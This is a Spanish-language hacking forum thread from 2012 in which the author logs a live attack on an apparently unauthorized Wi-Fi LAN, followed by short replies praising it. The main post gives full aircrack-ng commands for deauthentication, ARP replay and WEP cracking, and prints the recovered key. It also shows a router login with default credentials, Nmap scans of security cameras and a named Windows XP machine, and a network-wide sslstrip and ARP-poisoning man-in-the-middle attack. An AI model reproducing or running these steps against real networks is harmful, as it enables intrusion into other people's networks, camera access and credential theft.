Seguridad Informatica => Hacking => Mensaje iniciado por: odeveku en Junio 21, 2012, 02:47:28 pm
Título: Diario de un Ataque
Publicado por: odeveku en Junio 21, 2012, 02:47:28 pm
PRÓLOGO
En vista a las respuestas obtenidas en este hilo http://foro.hackxcrack.net/forum/index.php?topic=12351.0 se crea este post en el que se va a analizar y diseccionar un ataque en tiempo real a una red LAN. La idea es que toda la comunidad participe en el ataque aportando sus ideas, conocimientos y métodos para lograr primero comprender y luego comprometer la seguridad de la red. Yo pondré en práctica cada método que propongáis y postearé el resultado con capturas de pantalla etc. El objetivo es documentar y analizar en profundidad el ataque y los métodos empleados en él para que todos podamos beneficiarnos y aprender de ello. Al lío!
ENTRANDO EN LA RED
Sabemos que la red LAN que queremos atacar dispone de un router Wi-Fi con ESSID: WLAN_BE. Este es el único dato que tenemos por ahora, por lo que centramos nuestro ataque en el AP de la red Wi-Fi con el objetivo de autentificarnos como clientes legítimos de la red.
Corremos Backtrack.
Comenzamos con un monitoreo general de las redes a nuestro alcance para localizar nuestro objetivo. Descubrimos que el AP está emitiendo en el canal 6 y que su dirección MAC es E0:90:53:4A:68:AA. Además averiguamos que la contraseña tiene una encriptación WEP.
airodump-ng --bssid E0:90:53:4A:68:AA -c 6 -w wlan_be wlan0 Hacemos un ataque de falsa autenticación y nos asociamos con el AP para poder inyectar tráfico.
aireplay-ng -1 0 -a E0:90:53:4A:68:AA -h 00:11:22:33:44:55 -e WLAN_BE wlan0 Comenzamos a analizar paquetes buscando aquellos que contengan una petición de ARP para poder reinyectarlos. Al reinyectarlos provocamos que el AP tenga que emitir otro paquete ARP con un IV nuevo que capturamos con el airodump-ng. Este proceso es un bucle que se repite generando muchisimo tráfico.
aireplay-ng -3 0 -b E0:90:53:4A:68:AA -h 00:11:22:33:44:55 wlan0 Como no encontramos ningún paquete de ARP que reinyectar, lanzamos un ataque de desautenticación a un cliente legítimo para que al volver a autenticarse genere una petición de ARP que podamos capturar y reinyectar.
aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0 Crackeamos el password de la red mediante los IVs obtenidos que hemos guardado en el wlan_be.cap.
aircrack-ng wlan_be.cap Ya tenemos el password de la red: XE091534A27BE Nos conectamos a ella como si fuéramos uno más.
TANTEANDO EL TERRENO
Una vez que estamos dentro de la red, hacemos un "reconocimiento del terreno" para saber ante que nos encontramos. Para ello vamos a realizar un escaneo con el Nmap.
ifconfig Esto nos sirve para saber que IP nos ha asignado el servidor DHCP, y así poder deducir en que rango de IPs nos estamos moviendo. Descubrimos que nuestra IP es 192.168.1.129 , por lo tanto sabemos que seguramente el servidor DHCP asigne las IPs dentro del rango 192.168.1.1-255.
Para confirmarlo y hacernos una idea general del mapa de la LAN realizamos un escaneo rápido con Nmap.
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 15:01 CEST Nmap scan report for 192.168.1.1 Host is up (0.011s latency). MAC Address: E0:91:53:4A:27:BE (XAVi Technologies) Nmap scan report for 192.168.1.10 Host is up (0.033s latency). MAC Address: 00:1B:11:01:30:95 (D-Link) Nmap scan report for 192.168.1.13 Host is up (0.0060s latency). MAC Address: 00:13:46:DB:B7:5C (D-Link) Nmap scan report for 192.168.1.14 Host is up (0.071s latency). MAC Address: 00:13:46:DC:2D:60 (D-Link) Nmap scan report for 192.168.1.15 Host is up (0.54s latency). MAC Address: 00:1C:F0:78:81:83 (D-Link) Nmap scan report for 192.168.1.16 Host is up (0.17s latency). MAC Address: F0:7D:68:05:A6:D0 (D-Link) Nmap scan report for 192.168.1.17 Host is up (0.17s latency). MAC Address: F0:7D:68:0A:87:5A (D-Link) Nmap scan report for 192.168.1.18 Host is up (0.092s latency). MAC Address: F0:7D:68:0A:87:49 (D-Link) Nmap scan report for 192.168.1.19 Host is up (0.32s latency). MAC Address: F0:7D:68:0A:86:C8 (D-Link) Nmap scan report for 192.168.1.20 Host is up (0.53s latency). MAC Address: F0:7D:68:0A:85:4B (D-Link) Nmap scan report for 192.168.1.33 Host is up (0.0037s latency). MAC Address: 00:26:24:75:5B:6F (Thomson) Nmap scan report for 192.168.1.34 Host is up (0.0032s latency). MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.) Nmap scan report for 192.168.1.36 Host is up (0.0079s latency). MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company) Nmap scan report for 192.168.1.38 Host is up (0.25s latency). MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.) Nmap scan report for 192.168.1.129 Host is up. Nmap done: 255 IP addresses (15 hosts up) scanned in 14.13 seconds
Descubrimos que hay 15 máquinas conectadas mediante la WLAN y confirmamos nuestras sospechas de que el servidor DHCP asigna IPs en el rango 192.168.1.1-255 . Esto ya nos permite esbozar un mapa más o menos aproximado de la red.
La ip 192.168.1.1 corresponde seguramente al AP, osea al router, que parece ser un Xavii. Vemos un rango de Ips 192.168.1.10-20 que corresponden a aparatos D-Link lo que es bastante llamativo. Vemos otras IPs correspondientes a varios hosts. Y por último vemos nuestra IP 192.168.1.129 que la descartamos del análisis.
Una vez que tenemos más o menos claro por donde nos movemos... vamos a ver que pasa con ese router.
EL ROUTER
En el escaneo anterior hemos visto que la IP del router era 192.168.1.1 .Esta vez vamos a realizar un escaneo más a fondo, buscando puerto abiertos, servicios, S.O... Para ello corremos el Nmap con los siguientes parámetros:
Nmap scan report for 192.168.1.1 Host is up (0.0065s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Xavi 7768 WAP ftpd 1.00 23/tcp open telnet Zoom X6 ADSL router telnetd 53/tcp open tcpwrapped 80/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0) 2800/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0) 8008/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0) MAC Address: E0:91:53:4A:27:BE (XAVi Technologies) Device type: broadband router|WAP Running: Allied Data embedded, Belkin embedded, Intracom embedded, Iskratel embedded OS details: Broadband router (Allied Data CopperJet, Belkin F5D7632-4, Intracom Jetspeed 500i, or Iskratel Sinope568 or Proteus932) Network Distance: 1 hop Service Info: Devices: WAP, broadband router
TRACEROUTE HOP RTT ADDRESS 1 6.45 ms 192.168.1.1 Vemos que entre otras cosas en el campo del ftp el nmap nos dice que se trata del modelo Xavii 7768. Esto es una aproximación y seguramente no sea totalmente cierto, pero nos sirve. Buscamos la documentación del router Xavii 7768 en internet http://www.adslayuda.com/xavi7768-cambiar_clave_acceso.html y vemos que el usuario y el password por defecto del router son 1234 y 1234 respectivamente. Es muy probable que no los hayan cambiado así que por probar que no quede.
Efectivamente no lo han cambiado. Ui, parece que alguien se ha dejado la puerta abierta... (http://img707.imageshack.us/img707/8495/routeroverview.png)
Comprobamos que como habíamos supuesto antes no se trata del modelo Xavii 7768, sino del 7968 plus. Y de repente en la pestaña de redireccionamiento de puertos...
BANG! Acabamos de descubrir que eran todos esos aparatos D-Link. Tenemos 9 cámaras con sus correspondientes IPs. Esto empieza a ponerse interesante... Además sabemos que alguien se conecta a ellas desde el exterior de la red, ya que no tendría sentido haber configurado un NAT si no vas a acceder desde fuera del router.
Personalmente ODIO las interfaces http de los routers, me parece todo una maraña de opciones y pestañas, así que vamos a conectarnos al router por telnet para tener una consola con todas las opciones ordenaditas en blanco sobre negro... 8)
--> 802.1x 802.1x port based authentication acl snmp remote management agent Get a file from a remote host ald Configuration commands for ald bridge Configure layer 2 bridge classifier Packet classifier configuration commands console Console access dhcpclient DHCP client configuration commands dhcpserver DHCP server configuration commands dnsclient DNS client configuration commands dnsrelay DNS relay configuration emux Ethernet Switch Multiplex configuration commands ethernet Commands to configure ethernet transports firewall Firewall configuration commands fullConeNat Full Cone NAT configuration commands help Top level CLI help igmp igmp configuration commands imdebug Directly access the information model ip Configure IP router lan logger Log to a remote host using syslog meter Packet metering configuration command nat NAT configuration commands port Physical port configuration commands pppoa PPP over ATM configuration pppoe PPP over Ethernet Configuration reboot reboot modem restore_defaults set all configuration to factory setting rfc1483 Commands to configure RFC1483 transports save_and_exit SAVES changes closing telnet session save_and_reboot SAVES changes and reboots modem. save_config Save configuration scheduler Configuration commands for scheduler security Security configuration commands not specific to NAT or firewall simpleconfig SimpleConfig Configuration commands sntpclient Simple Network Time Protocol Client commands stop system System administration commands transports Transport configuration commands upnp UPnP configuration commands user User commands wanacl snmp remote management webserver Webserver configuration commands wpa Configure WPA (Wireless Protected Access) zipb Configure Dynamic ZIPB mode --> Vaya... parece que se pueden hacer un par de cosas... Pasemos a las camaras!
CAMARAS
Cuando intentamos acceder a alguna de las camaras por el puerto designado en la tabla del NAT se abre una ventana como esta solicitandonos un user y una pass.
Nmap scan report for 192.168.1.13 Host is up (0.0076s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp GNU Inetutils FTPd 1.4.2 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 554/tcp open rtsp? | rtsp-methods: |_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN 1501/tcp open sas-3? MAC Address: 00:13:46:DB:B7:5C (D-Link) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:kernel:2.4 OS details: Linux 2.4.18 - 2.4.35 (likely embedded) Network Distance: 1 hop Service Info: Host: Network-Camera
TRACEROUTE HOP RTT ADDRESS 1 7.56 ms 192.168.1.13 CAMARA 3IP 192.168.1.14
Starting Nmap 5.61TEST4 Nmap scan report for 192.168.1.14 Host is up (0.28s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp GNU Inetutils FTPd 1.4.2 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 23/tcp open telnet Openwall GNU/*/Linux telnetd 554/tcp open rtsp? | rtsp-methods: |_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN MAC Address: 00:13:46:DC:2D:60 (D-Link) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:kernel:2.4 OS details: Linux 2.4.18 - 2.4.35 (likely embedded) Network Distance: 1 hop Service Info: Host: Network-Camera; OS: Linux
TRACEROUTE HOP RTT ADDRESS 1 281.05 ms 192.168.1.14
Starting Nmap 5.61TEST4 Nmap scan report for 192.168.1.15 Host is up (0.11s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp GNU Inetutils FTPd 1.4.2 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 23/tcp open telnet Openwall GNU/*/Linux telnetd 554/tcp open rtsp? | rtsp-methods: |_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN 1503/tcp open imtc-mcs? MAC Address: 00:1C:F0:78:81:83 (D-Link) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:kernel:2.4 OS details: Linux 2.4.18 - 2.4.35 (likely embedded) Network Distance: 1 hop Service Info: Host: Network-Camera; OS: Linux
TRACEROUTE HOP RTT ADDRESS 1 113.45 ms 192.168.1.15 CAMARA 5IP 192.168.1.16
Starting Nmap 5.61TEST4 Nmap scan report for 192.168.1.16 Host is up (0.27s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 443/tcp open ssl/http GoAhead-Webs embedded httpd | ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW | Not valid before: 2010-02-05 08:14:40 |_Not valid after: 2015-02-04 08:14:40 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) | http-title: Document Error: Unauthorized |_Requested resource was https://192.168.1.16:443/home.htm MAC Address: F0:7D:68:05:A6:D0 (D-Link) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:kernel:2.6 OS details: Linux 2.6.13 - 2.6.31 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 271.54 ms 192.168.1.16
Starting Nmap 5.61TEST4 Nmap scan report for 192.168.1.17 Host is up (0.34s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 443/tcp open ssl/http GoAhead-Webs embedded httpd | ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW | Not valid before: 2010-02-05 08:14:40 |_Not valid after: 2015-02-04 08:14:40 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) | http-title: Document Error: Unauthorized |_Requested resource was https://192.168.1.17:443/home.htm MAC Address: F0:7D:68:0A:87:5A (D-Link) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:kernel:2.6 OS details: Linux 2.6.13 - 2.6.31 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 336.91 ms 192.168.1.17
Starting Nmap 5.61TEST4 ( http://nmap.org ) Nmap scan report for 192.168.1.18 Host is up (0.34s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 443/tcp open ssl/http GoAhead-Webs embedded httpd | ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW | Not valid before: 2010-02-05 08:14:40 |_Not valid after: 2015-02-04 08:14:40 |_http-title: Requested resource was https://192.168.1.18:443/home.htm and no page was returned. MAC Address: F0:7D:68:0A:87:49 (D-Link) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:kernel:2.6 OS details: Linux 2.6.13 - 2.6.31 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 338.75 ms 192.168.1.18 CAMARA 8IP 192.168.1.19
Starting Nmap 5.61TEST4 Nmap scan report for 192.168.1.19 Host is up (0.66s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 443/tcp open ssl/http GoAhead-Webs embedded httpd | ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW | Not valid before: 2010-02-05 08:14:40 |_Not valid after: 2015-02-04 08:14:40 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) | http-title: Document Error: Unauthorized |_Requested resource was https://192.168.1.19:443/home.htm MAC Address: F0:7D:68:0A:86:C8 (D-Link) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:kernel:2.6 OS details: Linux 2.6.13 - 2.6.31 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 655.43 ms 192.168.1.19
Starting Nmap 5.61TEST4 Nmap scan report for 192.168.1.20 Host is up (0.36s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 443/tcp open ssl/http GoAhead-Webs embedded httpd | ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW | Not valid before: 2010-02-05 08:14:40 |_Not valid after: 2015-02-04 08:14:40 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) | http-title: Document Error: Unauthorized |_Requested resource was https://192.168.1.20:443/home.htm MAC Address: F0:7D:68:0A:85:4B (D-Link) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:kernel:2.6 OS details: Linux 2.6.13 - 2.6.31 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 360.67 ms 192.168.1.20 Una vez escaneadas las camaras escaneamos el resto de IPs para hacernos una idea de que otros equipos hay en la WLAN.
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:10 CEST Nmap scan report for 192.168.1.33 Host is up (0.0045s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 80/tcp open http Virata-EmWeb 6.2.1 |_http-title: HP Photosmart Wireless B109n-z 139/tcp open tcpwrapped 445/tcp open netbios-ssn 6839/tcp open tcpwrapped 7435/tcp open tcpwrapped 8080/tcp open http-proxy? |_http-methods: No Allow or Public header in OPTIONS response (status code 404) 9100/tcp open jetdirect? 9101/tcp open jetdirect? 9102/tcp open jetdirect? 9110/tcp open unknown 9220/tcp open hp-gsg HP Generic Scan Gateway 1.0 9290/tcp open hp-gsg IEEE 1284.4 scan peripheral gateway 9500/tcp open ismserver? MAC Address: F4:CE:46:EE:2C:E2 (Hewlett-Packard Company) Device type: printer Running: HP embedded OS details: HP PhotoSmart C390 or C4780, or Officejet 7000 printer, HP printer: Photosmart 4300-, 6500-, 7200-, or 8100-series, or Officejet 6000-series Network Distance: 1 hop Service Info: Device: printer
Starting Nmap 5.61TEST4 Nmap scan report for 192.168.1.34 Host is up (0.0029s latency). Not shown: 990 filtered ports PORT STATE SERVICE VERSION 21/tcp open tcpwrapped 139/tcp open netbios-ssn 427/tcp closed svrloc 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 700/tcp open tcpwrapped 1073/tcp open tcpwrapped 2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP) 6000/tcp open X11? 8000/tcp open http-alt? 8001/tcp open vcom-tunnel? MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.) Device type: general purpose Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (98%) OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 Aggressive OS guesses: Microsoft Windows XP Professional SP2 (firewall enabled) (98%), Microsoft Windows Small Business Server 2003 (98%), Microsoft Windows XP SP2 (94%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP SP3 (93%), Microsoft Windows XP Embedded SP2 (92%), Microsoft Windows XP SP2 or SP3 (92%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (91%), Microsoft Windows Server 2003 SP1 - SP2 (90%), Microsoft Windows Server 2003 SP1 or SP2 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_nbstat: NetBIOS name: JACOBO, NetBIOS user: <unknown>, NetBIOS MAC: 00:10:dc:e4:ee:c0 (Micro-star International CO.) |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-security-mode: | Account that was used for smb scripts: guest | User-level authentication | SMB Security: Challenge/response passwords supported |_ Message signing disabled (dangerous, but default) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Computer name: Jacobo | NetBIOS computer name: JACOBO | Workgroup: DEVO |_ System time: 2012-06-21 21:22:21 UTC+1
TRACEROUTE HOP RTT ADDRESS 1 2.94 ms 192.168.1.34 192.168.1.36IMPRESORA HP
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:43 CEST Nmap scan report for 192.168.1.36 Host is up (0.033s latency). Not shown: 985 closed ports PORT STATE SERVICE VERSION 80/tcp open http? |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 139/tcp open tcpwrapped 445/tcp open netbios-ssn 631/tcp open ipp? |_http-methods: No Allow or Public header in OPTIONS response (status code 404) 6839/tcp open tcpwrapped 7435/tcp open tcpwrapped 8080/tcp open http-proxy? 9100/tcp open jetdirect? 9101/tcp open jetdirect? 9102/tcp open jetdirect? 9110/tcp open unknown 9111/tcp open DragonIDSConsole? 9220/tcp open hp-gsg HP Generic Scan Gateway 1.0 9290/tcp open hp-gsg IEEE 1284.4 scan peripheral gateway 9500/tcp open ismserver? MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company) Device type: printer|power-device Running: HP embedded, HP VxWorks, MGE embedded OS CPE: cpe:/o:hp:vxworks OS details: HP LaserJet CM1312 or Photosmart C510a printer, VxWorks: HP printer or MGE MX 5000 RT UPS Network Distance: 1 hop Service Info: Device: printer
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:55 CEST Nmap scan report for 192.168.1.38 Host is up (0.49s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 2869/tcp closed icslap 2968/tcp open enpp? MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.) Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows XP|98|2000|NT|2003|PocketPC/CE (94%), HTC Windows PocketPC/CE (91%), Sony Ericsson Symbian OS 9.X (88%), Ness embedded (87%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_98 cpe:/o:htc:windows_ce cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_nt cpe:/o:microsoft:windows_server_2003 cpe:/o:sonyericsson:symbian_os:9 cpe:/o:microsoft:windows_ce Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows 98 SE (92%), Microsoft Windows XP SP2 (91%), HTC Touch mobile phone (Windows Mobile 6) (91%), Microsoft Windows 98 (91%), Microsoft Windows XP Home SP2 (91%), Microsoft Windows XP Professional SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows NT 4.0 SP5 (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 486.83 ms 192.168.1.38
Observamos que la MAC del host pertenece a Edimax Technology Co. http://www.edimax.es/es/index.php Basta una búsqueda en internet para averiguar que es una empresa que se dedica a la fabricación de dispositivos Wireless, entre ellos cámaras Wireless. Será otra cámara?
Starting Nmap 5.61TEST4 Nmap scan report for 192.168.1.10 Host is up (0.0072s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 23/tcp open telnet D-Link Access Point telnetd 80/tcp open tcpwrapped 443/tcp open tcpwrapped | ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=HsinChu/countryName=TW | Not valid before: 2004-07-12 09:02:20 |_Not valid after: 2024-07-12 09:02:20 | http-methods: Potentially risky methods: PUT |_See http://nmap.org/nsedoc/scripts/http-methods.html MAC Address: 00:1B:11:01:30:95 (D-Link) OS details: WAP (Cisco Aironet 1010, D-Link DWL-2100AP or DWL-3200AP, Linksys WAP51AB or WAP55AG, Netgear WPN824, or Proxim ORiNOCO AP-4000M), Lights-Out remote server management, or ReplayTV 5500 DVR, Enterasys Matrix C1 switch or HP LaserJet 3600 printer Network Distance: 1 hop Service Info: Device: router
TRACEROUTE HOP RTT ADDRESS 1 7.18 ms 192.168.1.10
Los resultados que obtenemos para esta IP son bastante interesantes, ya que según Nmap parace que nos encontramos frente a otro router. Esto rompería los esquemas que nos habíamos hecho en un principio sobre la composición de la red.
ETHERAPE
Para entender mejor como funciona la red y que hosts se comunican entre sí ejecutamos el Etherape. Etherape es un programa que básicamente sirve para mapear el recorrido que siguen las comunicaciones en la red para así poder hacernos una idea de la estructura de la misma.
Esto es lo que obtenemos tras un rato ejecutando etherape: (http://img806.imageshack.us/img806/3879/sinttulo1xw.png)
Como se puede ver parece que la IP 239.255.255.250 se comunica constantemente con las IPs de las camaras de seguridad. Esto llama la atención, primero porque en nuestro primer escaneo con Nmap no habíamos detectado ese host, lo que hace pensar que se trata de un host externo a la red (más adelante veremos que esto no es así). Ejecutamos Nmap para intentar escanearlo.
Starting Nmap 5.61TEST4 Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 0.44 seconds
Efectivamente nos da como resultado host down. Probamos con algo diferente, vamos a realizar un ping a la IP mientras corremos el Etherape para mapear el recorrido de los paquetes.
Esto es lo que obtenemos con Etherape+Ping: (http://img696.imageshack.us/img696/7058/60406898.png) (http://img28.imageshack.us/img28/2589/sinttulo1fer.png)
IP 239.255.255.250MULTIDIFUSIÓN UPnP
Como podemos ver, nosotros estamos mandando paquetes solamente a la IP 239.255.255.250 pero recibimos paquetes de respuesta de las IPs 192.168.1.1 192.168.1.13 192.168.1.14 192.168.1.15 . Esto significa que la IP 239.255.255.250 reenvía nuestros "paquetes de ping" a esas IPs, como puede verse en el mapeado de Etherape. Otro dato interesante es que en algunos paquetes aparece "DUP!", esto quiere decir que el paquete está duplicado, lo que nos indica que nos llegan varias respuestas iguales desde diferentes direcciones, osea, que el paquete que les llega a todos los hosts es el mismo paquete que nosotros envíamos a 239.255.255.250, por eso nos llegan respuestas repetidas.
Si investigamos un poco en internet http://sanmaikelnews.comze.com/?p=66, descubrimos que la ip 239.255.255.250 es una dirección de multidifusión utilizada por el protocolo UPnP. Los dispositivos que ofrecen servicios UPnP envian periódicamente NOTIFICACIONES SSDP al 239.255.255.250:1900, anunciandose a los clientes que están escuchando. Una NOTIFICACION SSDP contiene una cabecera de ‘Localización’ donde especifica la ubicación de un archivo XML. Este archivo XML contiene datos que indican, entre otras cosas, el tipo (s) de dispositivo UPnP y los servicios soportados por el host, así como rutas adicionales a otros documentos XML que describen los diversos servicios en detalle. Del mismo modo, los clientes UPnP pueden enviar requerimientos SSDP M-SEARCH al 239.255.255.250:1900 para ver si alguno de los dispositivos UPnP responde.
MIRANDA
Auditar dispositivos UPnP de manera manual es un proceso que requiere mucho tiempo y dedicación. Miranda es un script escrito en python que nos permite automatizar y acelerar considerablemente todo este proceso.
Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...
**************************************************************** SSDP reply message from 192.168.1.17:8838 XML file is located at http://192.168.1.17:8838/rootdesc.xml Device is running Cellvision UPnP/1.0 ****************************************************************
**************************************************************** SSDP reply message from 192.168.1.16:8156 XML file is located at http://192.168.1.16:8156/rootdesc.xml Device is running Cellvision UPnP/1.0 ****************************************************************
**************************************************************** SSDP reply message from 192.168.1.20:8838 XML file is located at http://192.168.1.20:8838/rootdesc.xml Device is running Cellvision UPnP/1.0 ****************************************************************
**************************************************************** SSDP reply message from 192.168.1.19:8838 XML file is located at http://192.168.1.19:8838/rootdesc.xml Device is running Cellvision UPnP/1.0 ****************************************************************
**************************************************************** SSDP reply message from 192.168.1.1:2800 XML file is located at http://192.168.1.1:2800/WFADevice.xml Device is running Unknown/0.0 UPnP/1.0 Conexant-EmWeb/R6_1_0 ****************************************************************
**************************************************************** SSDP reply message from 192.168.1.15:11993 XML file is located at http://192.168.1.15:11993/description.xml Device is running Embedded UPnP/1.0 ****************************************************************
**************************************************************** SSDP reply message from 192.168.1.18:8838 XML file is located at http://192.168.1.18:8838/rootdesc.xml Device is running Cellvision UPnP/1.0 ****************************************************************
**************************************************************** SSDP notification message from 192.168.1.13:10242 XML file is located at http://192.168.1.13:10242/description.xml Device is running Embedded UPnP/1.0 ****************************************************************
**************************************************************** SSDP reply message from 192.168.1.14:10242 XML file is located at http://192.168.1.14:10242/description.xml Device is running Embedded UPnP/1.0 ****************************************************************
`YMM' `MM' db `7MMM. ,MMF' db .M"""bgd VMA ,V ;MM: MMMb dPMM ;MM: ,MI "Y VMA ,V ,V^MM. M YM ,M MM ,V^MM. `MMb. VMMP ,M `MM M Mb M' MM ,M `MM `YMMNq. MM AbmmmqMA M YM.P' MM AbmmmqMA . `MM MM A' VML M `YM' MM A' VML Mb dM .JMML..AMA. .AMMA..JML. `' .JMML..AMA. .AMMA.P"Ybmmd" =========================================================================== = Welcome to Yet Another MITM Automation Script. = = Use this tool responsibly, and enjoy! = = Feel free to contribute and distribute this script as you please. = = Official thread : http://tinyurl.com/yamas-bt5 = = Check out the help (-h) to see new features and informations = = You are running version 20120213 = =========================================================================== Message of the day : Reviewing some code... Could someone send me a complete log file? I'm planning on making a better parsing. On another note, I today had the privilege to witness that Yamas works against Youporn mobile. MMD.
Please make sure to check out my last project : http://msimdb.comax.fr
[+] Cleaning iptables [-] Cleaned.
[+] Activating IP forwarding... [-] Activated.
[+] Configuring iptables... To what port should the traffic be redirected to? (default = 8080)
Port 8080 selected as default.
From what port should the traffic be redirected to? (default = 80)
Port 80 selected as default.
Traffic from port 80 will be redirected to port 8080 [-] Traffic rerouted
[+] Activating sslstrip... Choose filename to output : (default = yamas) wlan_ed Sslstrip will be listening on port 8080 and outputting log in /tmp/wlan_ed.txt
sslstrip 0.9 by Moxie Marlinspike running...
[-] Sslstrip is running.
[+] Activating ARP cache poisoning...
Gateway : 192.168.1.1 Interface : wlan0
Enter IP gateway adress or press enter to use 192.168.1.1.
192.168.1.1 selected as default.
What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.
wlan0 selected as default.
We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D. Press enter to default.
Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof [-] Arp cache poisoning is launched. Keep new window(s) running.
METASPLOIT -------------- CAPITULO EN CONSTRUCCIÓN --------------------
Título: Re:Diario de un Ataque
Publicado por: djtux en Junio 21, 2012, 07:50:25 pm
muy buen aporte de hecho muy interesante pero tengo una pregunta habrá alguna manera de correr backtrack desde mac os x????
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 21, 2012, 07:56:42 pm
Sí, la hay. http://bit.ly/LjhPps De todas formas, si quieres preguntar algo que no tiene nada que ver con mi post, lo mejor es crear un post nuevo.
Título: Re:Diario de un Ataque
Publicado por: kid_goth en Junio 21, 2012, 08:33:33 pm
;D ta gueno xD... Saludos
Título: Re:Diario de un Ataque
Publicado por: JAG en Junio 21, 2012, 08:49:04 pm
Que bueno tio... me gusta la labor que estas realizando... ;)
Título: Re:Diario de un Ataque
Publicado por: miyamoto340 en Junio 21, 2012, 08:59:24 pm
Muy buen aporte, esperaré a ver como sigues xD
Título: Re:Diario de un Ataque
Publicado por: ACK en Junio 21, 2012, 09:15:45 pm
Excelente trabajo! Esto se pone interesante muajaja ;D
Saludos familia ;)
Título: Re:Diario de un Ataque
Publicado por: D16174L_MURD3R en Junio 21, 2012, 09:37:23 pm
Muy interesante el post!, ya hacía tiempo que no entraba al foro. Saludos!.
Título: Re:Diario de un Ataque
Publicado por: coco en Junio 21, 2012, 09:46:42 pm
buen trabajo esperemos el desenlase saludos.
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 21, 2012, 10:50:15 pm
